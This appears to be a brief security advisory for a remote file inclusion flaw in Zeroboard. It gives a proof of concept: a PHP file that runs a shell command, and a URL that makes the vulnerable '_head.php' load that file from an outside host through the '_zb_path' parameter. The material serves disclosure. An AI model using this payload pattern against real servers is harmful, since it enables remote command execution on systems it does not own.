Zeroboard PHP Include File Arbitrary Command Execution Vulnerability

Zeroboard PHP Include File Arbitrary Command Execution Vulnerability

The following proof of concept has been made available:

PHP Source file a.php
<? passthru("/bin/ls"); ?>

Accessing URL on vulnerable system:
http://vulnerablesystem/_head.php?_zb_path=http://example.com/a